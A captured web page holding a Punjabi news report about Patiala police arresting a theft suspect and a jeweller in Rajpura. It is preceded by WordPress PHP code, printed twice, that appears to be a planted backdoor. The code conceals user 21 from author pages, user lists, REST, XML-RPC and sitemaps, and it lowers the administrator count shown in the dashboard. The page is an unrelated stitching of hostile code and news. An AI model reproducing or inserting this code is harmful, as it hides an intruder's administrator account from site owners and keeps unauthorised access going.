add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਪਟਿਆਲਾ ਪੁਲਿਸ ਨੇ 2 ਸਾਲ ਪੁਰਾਣਾ ਚੋਰੀ ਦਾ ਮਾਮਲਾ ਸੁਲਝਾਇਆ, ਦੋ ਕਾਬੂ-ਐਸ.ਐਸ.ਪੀ. - Press Ki Taquat
No Result
View All Result
ਰਾਜਪੁਰਾ, 3 ਜੂਨ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) : ਪਟਿਆਲਾ ਪੁਲਿਸ ਨੇ ਇੱਕ ਦੋ ਸਾਲ ਪੁਰਾਣਾ ਚੋਰੀ ਦਾ ਮਾਮਲਾ ਹੱਲ ਕਰਦਿਆਂ ਰਾਜਪੁਰਾ ਵਿਖੇ ਦੋ ਜਣਿਆਂ ਨੂੰ ਗ੍ਰਿਫ਼ਤਾਰ ਕੀਤਾ ਹੈ। ਇਨ੍ਹਾਂ ਵਿੱਚੋਂ ਇੱਕ ਕੋਲੋਂ ਚੋਰੀ ਕੀਤਾ .32 ਬੋਰ ਦਾ ਇੱਕ ਲਾਇਸੰਸੀ ਰਿਵਾਲਵਰ ਅਤੇ 4 ਕਾਰਤੂਸ ਵੀ ਬਰਾਮਦ ਹੋਏ ਹਨ, ਜਦੋਂਕਿ ਦੂਸਰਾ ਉਹ ਸੁਨਿਆਰ ਹੈ, ਜਿਸ ਨੇ ਚੋਰੀ ਦਾ ਸੋਨਾ ਖਰੀਦਿਆ ਸੀ। ਇਹ ਜਾਣਕਾਰੀ ਦਿੰਦਿਆਂ ਐਸ.ਐਸ.ਪੀ. ਸ. ਮਨਦੀਪ ਸਿੰਘ ਸਿੱਧੂ ਨੇ ਦੱਸਿਆ ਕਿ ਪੰਜਾਬ ਸਰਕਾਰ ਵੱਲੋਂ ਅਰੰਭੇ ਮਿਸ਼ਨ ਫ਼ਤਿਹ ਤਹਿਤ ਕੋਰੋਨਾ ਵਾਇਰਸ ਦੀ ਲਾਗ ਨੂੰ ਫੈਲਣ ਤੋਂ ਰੋਕਣ ਲਈ ਮਾਸਕ ਆਦਿ ਸਮੇਤ ਹੋਰ ਹਦਾਇਤਾਂ ਦੇ ਮੱਦੇਨਜ਼ਰ ਕੀਤੀ ਜਾ ਰਹੀ ਚੈਕਿੰਗ ਦੌਰਾਨ ਆਈ.ਟੀ.ਆਈ. ਚੌਕ ਰਾਜਪੁਰਾ ਵਿਖੇ ਪੁਲਿਸ ਵੱਲੋਂ ਲਗਾਏ ਨਾਕੇ ਦੌਰਾਨ ਇਹ ਗ੍ਰਿਫ਼ਤਾਰੀ ਹੋਈ ਹੈ।
ਸ. ਸਿੱਧੂ ਨੇ ਦੱਸਿਆ ਕਿ ਇਸ ਨਾਕੇ ‘ਤੇ ਜਦੋਂ ਇੱਕ ਵਿਅਕਤੀ ਨੂੰ ਮਾਸਕ ਨਾ ਪਾਉਣ ਦੀ ਉਲੰਘਣਾ ਕਰਨ ਕਰਕੇ ਚੈਕਿੰਗ ਲਈ ਰੋਕਿਆ ਤਾਂ ਇਸ ਵਿਅਕਤੀ ਨੇ ਰੁਕਣ ਦੀ ਥਾਂ ਵਾਪਸ ਮੁੜਨ ਦੀ ਕੋਸ਼ਿਸ਼ ਕੀਤੀ ਪਰੰਤੂ ਇਸ ਨੂੰ ਪੁਲਿਸ ਨੇ ਮੁਸਤੈਦੀ ਦਿਖਾਉਂਦਿਆਂ ਕੁਝ ਮੀਟਰ ਦੀ ਦੂਰੀ ‘ਤੇ ਹੀ ਰੋਕ ਲਿਆ ਗਿਆ। ਇਸ ਦੀ ਚੈਕਿੰਗ ਦੌਰਾਨ ਇਸ ਕੋਲੋਂ ਇੱਕ ਇੰਡੀਅਨ ਆਰਡੀਨੈਂਸ ਫੈਕਟਰੀ ਦਾ ਬਣਿਆਂ .32 ਰਿਵਾਲਵਰ ਬਰਾਮਦ ਹੋਇਆ।
ਐਸ.ਐਸ.ਪੀ. ਨੇ ਦੱਸਿਆ ਕਿ ਮੁੱਢਲੀ ਪੁੱਛਗਿੱਛ ਦੌਰਾਨ ਇਸ ਦੀ ਪਛਾਣ ਅਮਿਤ ਕੁਮਾਰ ਵਾਸੀ ਅੰਬਾਲਾ ਕੈਂਟ ਵਜੋਂ ਹੋਈ ਅਤੇ ਇਸ ਨੇ ਦੋ ਸਾਲ ਪਹਿਲਾਂ ਐਸ.ਬੀ.ਐਸ. ਕਲੋਨੀ ਰਾਜਪੁਰਾ ਤੋਂ 30 ਗ੍ਰਾਮ ਸੋਨਾ ਅਤੇ 18 ਹਜ਼ਾਰ ਦੀ ਨਗ਼ਦੀ ਚੋਰੀ ਕੀਤੀ ਸੀ ਅਤੇ ਇਹ ਉਦੋਂ ਤੋਂ ਹੀ ਅੰਬਾਲਾ ਰਹਿ ਰਿਹਾ ਸੀ। ਜਦੋਂਕਿ ਇਸ ਤੋਂ ਪਹਿਲਾਂ ਇਹ ਰਾਜਪੁਰਾ ਵਿਖੇ ਸੰਦੀਪ ਕੁਮਾਰ ਨਾਂ ਦੇ ਇੱਕ ਹੋਰ ਵਿਅਕਤੀ ਨਾਲ ਸਬਜੀ ਵੇਚਣ ਦਾ ਕੰਮ ਕਰਦਾ ਸੀ। ਇਸ ਨੇ ਚੋਰੀ ਕੀਤਾ ਸੋਨਾ ਸੁਨਿਆਰ ਰਮੇਸ਼ ਕੁਮਾਰ ਨੂੰ 12 ਹਜ਼ਾਰ ਵਿੱਚ ਵੇਚਿਆ ਸੀ ਅਤੇ ਇਸ ਨੇ ਇਹ ਸਾਰਾ ਪੈਸਾ ਖ਼ਰਚ ਦਿੱਤਾ ਸੀ।
ਸ. ਸਿੱਧੂ ਨੇ ਹੋਰ ਦੱਸਿਆ ਕਿ ਅੱਜ ਇਹ ਅਮਿਤ ਕੁਮਾਰ ਸਬਜ਼ੀ ਵੇਚਣ ਦਾ ਕੰਮ ਕਰਦੇ ਸੰਦੀਪ ਕੁਮਾਰ ਵਾਸੀ ਡਾਲਿਮਾ ਵਿਹਾਰ ਰਾਜਪੁਰਾ ਨੂੰ ਮਿਲਣ ਜਾ ਰਿਹਾ ਸੀ ਅਤੇ ਰਸਤੇ ਵਿੱਚ ਹੀ ਪੁਲਿਸ ਦੀ ਗ੍ਰਿਫ਼ਤ ‘ਚ ਆ ਗਿਆ। ਉਨ੍ਹਾਂ ਦੱਸਿਆ ਕਿ ਪੁਲਿਸ ਨੇ ਸੰਦੀਪ ਜਵੈਲਰ ਦੇ ਰਮੇਸ਼ ਚੰਦ ਨੂੰ ਵੀ ਗ੍ਰਿਫ਼ਤਾਰ ਕਰ ਲਿਆ ਗਿਆ ਹੈ। ਉਨ੍ਹਾਂ ਦੱਸਿਆ ਕਿ ਮਾਮਲੇ ਦੀ ਅਗਲੇਰੀ ਪੜਤਾਲ ਐਸ.ਐਚ.ਓ. ਸਿਟੀ ਰਾਜਪੁਰਾ ਐਸ.ਆਈ. ਬਲਵਿੰਦਰ ਸਿੰਘ ਨੂੰ ਸੌਂਪੀ ਗਈ ਹੈ। ਸ. ਸਿੱਧੂ ਨੇ ਦੱਸਿਆ ਕਿ ਪੁਲਿਸ ਨੇ ਬੀਤੇ ਦਿਨ ਵੀ ਨਾਕਾਬੰਦੀ ਦੌਰਾਨ ਨਸ਼ਿਆਂ ਦੇ ਮਾਮਲਿਆਂ ‘ਚ ਲੋੜੀਂਦੇ ਦੋ ਜਣਿਆਂ ਨੂੰ ਗ੍ਰਿਫ਼ਤਾਰ ਕੀਤਾ ਸੀ।
Post Views: 180
No Result
View All Result